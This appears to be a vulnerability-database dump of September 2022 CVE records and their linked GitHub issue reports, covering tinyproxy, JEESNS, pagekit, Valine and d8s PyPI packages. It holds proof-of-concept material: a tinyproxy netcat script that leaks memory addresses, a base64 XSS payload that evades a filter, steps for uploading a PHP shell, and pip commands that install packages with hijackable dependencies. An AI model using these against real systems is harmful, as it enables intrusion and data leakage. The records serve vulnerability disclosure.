{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/democritus-project/d8s-xml/issues/10" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://pypi.org/project/d8s-xml/" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://pypi.org/project/democritus-strings/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/democritus-project/d8s-xml/issues/10" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://pypi.org/project/d8s-xml/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://pypi.org/project/democritus-strings/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:d8s-xml_project:d8s-xml:0.1.0:*:*:*:*:python:*:*", "matchCriteriaId": "1DD9E9CA-4056-4318-8D34-98621C118782", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/democritus-project/d8s-xml/issues/10
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "democritus-project", "d8s-xml" ]
We discovered a potential code execution backdoor in version 0.1.0 of the project, the backdoor is the democritus-strings package. Attackers can upload democritus-strings packages containing arbitrary malicious code. For the safety of this project, the democritus-strings package has been uploaded by us. ![image](https://user-images.githubusercontent.com/58363074/187009667-72cbefd1-51cc-4252-99f6-c3cc56d5d22c.png) The democritus-strings package can be successfully installed using `pip install d8s-xml==0.1.0` ![image](https://user-images.githubusercontent.com/58363074/187009807-1a61096f-9893-4f90-b5ab-20e0306e7d5a.png) Suggestion: remove version 0.1.0 of this project in PyPI
code execution backdoor
https://api.github.com/repos/democritus-project/d8s-xml/issues/10/comments
1
2022-08-27T01:58:05Z
2022-09-24T23:13:39Z
https://github.com/democritus-project/d8s-xml/issues/10
1,352,909,676
10
4,175
CVE-2022-38887
2022-09-19T16:15:11.793
The d8s-python for python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The democritus-strings package. The affected version is 0.1.0.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/democritus-project/d8s-python/issues/36" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://pypi.org/project/d8s-python/" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://pypi.org/project/democritus-strings/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/democritus-project/d8s-python/issues/36" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://pypi.org/project/d8s-python/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://pypi.org/project/democritus-strings/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:d8s-python_project:d8s-python:0.1.0:*:*:*:*:python:*:*", "matchCriteriaId": "44EE3779-051F-4F44-A836-64BFE366536C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/democritus-project/d8s-python/issues/36
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "democritus-project", "d8s-python" ]
We discovered a potential code execution backdoor in version 0.1.0 of the project, the backdoor is the democritus-strings package. Attackers can upload democritus-strings packages containing arbitrary malicious code. For the safety of this project, the democritus-strings package has been uploaded by us. ![image](https://user-images.githubusercontent.com/58363074/187018927-bf7a1ccb-b447-41b0-be5c-b90c62349b22.png) The democritus-strings package can be successfully installed using `pip install d8s-python==0.1.0` ![image](https://user-images.githubusercontent.com/58363074/187018998-02fe646f-1615-4224-b5de-3d3b687541de.png) Suggestion: remove version 0.1.0 of this project in PyPI
code execution backdoor
https://api.github.com/repos/democritus-project/d8s-python/issues/36/comments
0
2022-08-27T06:59:40Z
2022-08-27T06:59:40Z
https://github.com/democritus-project/d8s-python/issues/36
1,352,965,984
36
4,176
CVE-2022-40431
2022-09-19T16:15:12.087
The d8s-pdfs for python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-networking package. The affected version is 0.1.0.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/democritus-project/d8s-pdfs/issues/5" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://pypi.org/project/democritus-networking/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/democritus-project/d8s-pdfs/issues/5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://pypi.org/project/democritus-networking/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:d8s-pdfs_project:d8s-pdfs:0.1.0:*:*:*:*:python:*:*", "matchCriteriaId": "17FF50DC-5EBD-47CF-9664-DB44B3608D0B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/democritus-project/d8s-pdfs/issues/5
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "democritus-project", "d8s-pdfs" ]
We discovered a potential code execution backdoor in version 0.1.0 of the project, the backdoor is the democritus-networking package. Attackers can upload democritus-networking packages containing arbitrary malicious code. For the safety of this project, the democritus-networking package has been uploaded by us. ![image](https://user-images.githubusercontent.com/58363074/189521591-94832ae2-4e13-4f67-9489-58b67d9af135.png) The democritus-networking package can be successfully installed using `pip install d8s-pdfs==0.1.0` ![image](https://user-images.githubusercontent.com/58363074/189521805-b9fe047c-3910-47e4-9615-73a3cfca6cc4.png) Suggestion: remove version 0.1.0 of this project in PyPI
code execution backdoor
https://api.github.com/repos/democritus-project/d8s-pdfs/issues/5/comments
0
2022-09-11T10:00:20Z
2022-09-11T10:01:58Z
https://github.com/democritus-project/d8s-pdfs/issues/5
1,368,894,070
5
4,177
CVE-2022-40432
2022-09-19T16:15:12.127
The d8s-strings for python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-hypothesis package. The affected version is 0.1.0.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/democritus-project/d8s-strings/issues/21" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://pypi.org/project/d8s-strings/" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://pypi.org/project/democritus-hypothesis/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/democritus-project/d8s-strings/issues/21" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://pypi.org/project/d8s-strings/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://pypi.org/project/democritus-hypothesis/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:d8s-strings_project:d8s-strings:0.1.0:*:*:*:*:python:*:*", "matchCriteriaId": "D7CF89ED-B1A1-4275-8A73-D84A1A09BB95", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/democritus-project/d8s-strings/issues/21
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "democritus-project", "d8s-strings" ]
We discovered a potential code execution backdoor in version 0.1.0 of the project, the backdoor is the democritus-hypothesis package. Attackers can upload democritus-hypothesis packages containing arbitrary malicious code. For the safety of this project, the democritus-hypothesis package has been uploaded by us. ![image](https://user-images.githubusercontent.com/58363074/189530033-53bf3ae5-0d5c-4ef4-aa30-f4234a7ae13d.png) The democritus-hypothesis package can be successfully installed using `pip install d8s-strings==0.1.0` ![image](https://user-images.githubusercontent.com/58363074/189530131-dc7608d9-2c71-41ce-a899-f5080448d88a.png) Suggestion: remove version 0.1.0 of this project in PyPI
code execution backdoor
https://api.github.com/repos/democritus-project/d8s-strings/issues/21/comments
0
2022-09-11T13:28:18Z
2022-10-14T00:42:03Z
https://github.com/democritus-project/d8s-strings/issues/21
1,368,947,158
21
4,178
CVE-2022-40468
2022-09-19T17:15:14.700
Potential leak of left-over heap data if custom error page templates containing special non-standard variables are used. Tinyproxy commit 84f203f and earlier use uninitialized buffers in process_request() function.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/tinyproxy/tinyproxy" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/tinyproxy/tinyproxy/blob/84f203fb1c4733608c7283bbe794005a469c4b00/src/reqs.c#L346" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/tinyproxy/tinyproxy/issues/457" }, { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/tinyproxy/tinyproxy/issues/457#issuecomment-1264176815" }, { "source": "cve@mitre.org", "tags": null, "url": "https://security.gentoo.org/glsa/202305-27" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/tinyproxy/tinyproxy" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/tinyproxy/tinyproxy/blob/84f203fb1c4733608c7283bbe794005a469c4b00/src/reqs.c#L346" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/tinyproxy/tinyproxy/issues/457" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://github.com/tinyproxy/tinyproxy/issues/457#issuecomment-1264176815" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://security.gentoo.org/glsa/202305-27" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tinyproxy_project:tinyproxy:*:*:*:*:*:*:*:*", "matchCriteriaId": "3E51FD82-DAE3-49BD-A817-91A131CE6525", "versionEndExcluding": null, "versionEndIncluding": "1.11.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "1188" ]
1188
https://github.com/tinyproxy/tinyproxy/issues/457
[ "Exploit", "Third Party Advisory" ]
github.com
[ "tinyproxy", "tinyproxy" ]
> ubuntu 22.04 > GNU C Library (Ubuntu GLIBC 2.35-0ubuntu3.1) stable release version 2.35. 1. Clone & Compile ``` git clone https://github.com/tinyproxy/tinyproxy cd tinyproxy ./autogen.sh ./configure make ``` 2. Create a config file ``` vi ./1.conf Port 8888 Listen 0.0.0.0 Bind 0.0.0.0 Timeout 600 DefaultErrorFile "./default.html" StatHost "127.0.0.1" LogFile "./tinyproxy.log" Syslog Off LogLevel Info Allow 0.0.0.0/0 ViaProxyName "tinyproxy" ``` 3. Add one line to original default page ``` cp data/templates/default.html ./ sed -i '16a\<p>Url: {url}</p>' ./default.html ``` 4. Start tinyproxy server ``` ./src/tinyproxy -c ./1.conf -d ``` 5. Send HTTP request (Without HTTP method field) ``` #!/bin/bash echo -ne \ " http://www.baidu.com/ HTTP/1.1\r\n \ host: www.baidu.com\r\n \ User-Agent: fuck\r\n \ Accept: */*\r\n \ Proxy-Connection: Keep-Alive\r\n\r\n" \ | nc 127.0.0.1 8888 \ | grep -a "Url: " \ | hexdump -C ``` 5. The "URL" line in the result prints out the address of Glibc, which may be useful for attackers to launch attacks in the future.
Potential runtime system sensitive information disclosure through special HTTP requests.
https://api.github.com/repos/tinyproxy/tinyproxy/issues/457/comments
5
2022-09-08T13:25:39Z
2024-05-05T18:20:33Z
https://github.com/tinyproxy/tinyproxy/issues/457
1,366,329,471
457
4,179
CVE-2022-40468
2022-09-19T17:15:14.700
Potential leak of left-over heap data if custom error page templates containing special non-standard variables are used. Tinyproxy commit 84f203f and earlier use uninitialized buffers in process_request() function.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/tinyproxy/tinyproxy" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/tinyproxy/tinyproxy/blob/84f203fb1c4733608c7283bbe794005a469c4b00/src/reqs.c#L346" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/tinyproxy/tinyproxy/issues/457" }, { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/tinyproxy/tinyproxy/issues/457#issuecomment-1264176815" }, { "source": "cve@mitre.org", "tags": null, "url": "https://security.gentoo.org/glsa/202305-27" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/tinyproxy/tinyproxy" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/tinyproxy/tinyproxy/blob/84f203fb1c4733608c7283bbe794005a469c4b00/src/reqs.c#L346" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/tinyproxy/tinyproxy/issues/457" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://github.com/tinyproxy/tinyproxy/issues/457#issuecomment-1264176815" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://security.gentoo.org/glsa/202305-27" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tinyproxy_project:tinyproxy:*:*:*:*:*:*:*:*", "matchCriteriaId": "3E51FD82-DAE3-49BD-A817-91A131CE6525", "versionEndExcluding": null, "versionEndIncluding": "1.11.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "1188" ]
1188
https://github.com/tinyproxy/tinyproxy/issues/457#issuecomment-1264176815
null
github.com
[ "tinyproxy", "tinyproxy" ]
> ubuntu 22.04 > GNU C Library (Ubuntu GLIBC 2.35-0ubuntu3.1) stable release version 2.35. 1. Clone & Compile ``` git clone https://github.com/tinyproxy/tinyproxy cd tinyproxy ./autogen.sh ./configure make ``` 2. Create a config file ``` vi ./1.conf Port 8888 Listen 0.0.0.0 Bind 0.0.0.0 Timeout 600 DefaultErrorFile "./default.html" StatHost "127.0.0.1" LogFile "./tinyproxy.log" Syslog Off LogLevel Info Allow 0.0.0.0/0 ViaProxyName "tinyproxy" ``` 3. Add one line to original default page ``` cp data/templates/default.html ./ sed -i '16a\<p>Url: {url}</p>' ./default.html ``` 4. Start tinyproxy server ``` ./src/tinyproxy -c ./1.conf -d ``` 5. Send HTTP request (Without HTTP method field) ``` #!/bin/bash echo -ne \ " http://www.baidu.com/ HTTP/1.1\r\n \ host: www.baidu.com\r\n \ User-Agent: fuck\r\n \ Accept: */*\r\n \ Proxy-Connection: Keep-Alive\r\n\r\n" \ | nc 127.0.0.1 8888 \ | grep -a "Url: " \ | hexdump -C ``` 5. The "URL" line in the result prints out the address of Glibc, which may be useful for attackers to launch attacks in the future.
Potential runtime system sensitive information disclosure through special HTTP requests.
https://api.github.com/repos/tinyproxy/tinyproxy/issues/457/comments
5
2022-09-08T13:25:39Z
2024-05-05T18:20:33Z
https://github.com/tinyproxy/tinyproxy/issues/457
1,366,329,471
457
4,180
CVE-2022-38545
2022-09-19T23:15:09.203
Valine v1.4.18 was discovered to contain a remote code execution (RCE) vulnerability which allows attackers to execute arbitrary code via a crafted POST request.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.6, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/xCss/Valine/issues/400" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/xCss/Valine/issues/400" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:valine.js:valine:1.4.18:*:*:*:*:*:*:*", "matchCriteriaId": "71726106-9C57-4CCA-9A8C-34B1ACB32642", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/xCss/Valine/issues/400
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "xCss", "Valine" ]
如果您想报告错误,请提供以下信息 If you want to report a bug, please provide the following information: - [x] 可复现问题的步骤 The steps to reproduce. - [x] 可复现问题的网页地址 A minimal demo of the problem via https://jsfiddle.net or http://codepen.io/pen if possible. - [x] 受影响的Valine版本、操作系统,以及浏览器信息 Which versions of Valine, and which browser / OS are affected by this issue?
A XSS bug that can execute code(用户恶意修改 评论 的ua可触发XSS执行代码)
https://api.github.com/repos/xCss/Valine/issues/400/comments
3
2022-06-21T06:13:26Z
2022-10-11T08:44:36Z
https://github.com/xCss/Valine/issues/400
1,277,942,586
400
4,181
CVE-2022-38550
2022-09-19T23:15:09.247
A stored cross-site scripting (XSS) vulnerability in the /weibo/list component of Jeesns v2.0.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Pick-program/JEESNS/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Pick-program/JEESNS/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jeesns:jeesns:2.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "6771ECEB-00AE-4D70-BCEA-E6040665827E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/Pick-program/JEESNS/issues/1
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Pick-program", "JEESNS" ]
Tools required: BurpSuite, IDEA (Eclipse) Required source download address: https://github.com/zchuanzhao/jeesns/releases Deployment Instructions: https://gitee.com/zchuanzhao/jeesns#%E9%83%A8%E7%BD%B2%E8%AF%B4%E6%98%8E ![图片](https://user-images.githubusercontent.com/44825410/185644627-12c3a4e3-7699-40d6-9e2f-55cfd700b757.png) ![图片](https://user-images.githubusercontent.com/44825410/185644670-76806b84-c185-4b3f-ada9-7d54c2e11de5.png) Posting Payload in the "Twitter" function: <object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=></object> The stored XSS vulnerability can be triggered (the XSS vulnerability can obtain the cookie value of others, so as to forge the identity of others to log in, which is risky) : The code flow starts here at weibocontroller.java to get whether the user is logged in: ![图片](https://user-images.githubusercontent.com/44825410/185644871-ce5b965a-2455-4204-9b5e-18473c0af192.png) Then you call the XSS filter class, and the value you input will be checked for the following keywords. If there are any, the javascript statement will be disabled by underlining those sensitive words. This method can be circumvented by coding, such as payload, above. The < script > alert (" XSS ") < / script > Base64 encoded into PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4 = Use spurious protocol triggering to bypass detection: ![图片](https://user-images.githubusercontent.com/44825410/185645034-992d77ed-80da-4b9e-8e13-568d143d854b.png) ![图片](https://user-images.githubusercontent.com/44825410/185645059-9c94c38b-a928-4e47-aab9-acce84621d01.png) ![图片](https://user-images.githubusercontent.com/44825410/185645103-bc969ab4-7076-462b-b61d-49345ecab606.png)
The JEESNS has a storage-type XSS vulnerability
https://api.github.com/repos/Pick-program/JEESNS/issues/1/comments
0
2022-08-19T14:56:37Z
2022-08-19T14:56:37Z
https://github.com/Pick-program/JEESNS/issues/1
1,344,554,018
1
4,182
CVE-2022-38916
2022-09-20T17:15:09.393
A file upload vulnerability exists in the storage feature of pagekit 1.0.18, which allows an attacker to upload malicious files
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/pagekit/pagekit/issues/970" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/pagekit/pagekit/issues/970" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pagekit:pagekit:1.0.18:*:*:*:*:*:*:*", "matchCriteriaId": "A1E39691-604C-42A3-BA30-80433E0E09EA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/pagekit/pagekit/issues/970
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "pagekit", "pagekit" ]
<!-- Before submitting an issue, please try some troubleshooting steps: - Enabled debug mode: https://pagekit.com/docs/troubleshooting/debug-mode - Verify the server requirements: https://pagekit.com/docs/getting-started/requirements - Disable all installed extensions - Check the browser developer console for errors --> ## Problem A file upload vulnerability exists in the storage feature of pagekit 1.0.18, which allows an attacker to upload malicious files ## Technical Details - Pagekit version:1.0.18 - Webserver:Nginx2.4.18 - Database:Mysql5.7.26 - PHP Version:7.3.4 - OS:Windows10 A file upload vulnerability exists in the storage feature of pagekit v1.0.18, which allows an attacker to upload malicious files 1. do not set allow php files to be uploaded ![1](https://user-images.githubusercontent.com/58295122/186859834-e232c0c1-bc16-4e71-8668-d6025b80f4c6.jpg) 2. then select the upload point to upload the malicious php file and modify the packet via Burp Suite to change the file name ![2](https://user-images.githubusercontent.com/58295122/186859883-9bbede9c-cd94-4bd0-8073-663548abc65f.png) 3. Upload the file successfully ![3](https://user-images.githubusercontent.com/58295122/186859929-88be9f2a-3ca2-4643-b557-bf18af1cd1db.png) 4. The file can then be accessed at /storage/shell.php ![4](https://user-images.githubusercontent.com/58295122/186859977-ced3603e-ec91-4517-bbd9-dc956a447219.png)
file upload vulnerability in pagekit 1.0.18
https://api.github.com/repos/pagekit/pagekit/issues/970/comments
0
2022-08-26T09:09:53Z
2022-08-26T09:09:53Z
https://github.com/pagekit/pagekit/issues/970
1,351,985,961
970
4,183
CVE-2022-37259
2022-09-20T18:15:10.227
A Regular Expression Denial of Service (ReDoS) flaw was found in stealjs steal 2.2.4 via the string variable in babel.js.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
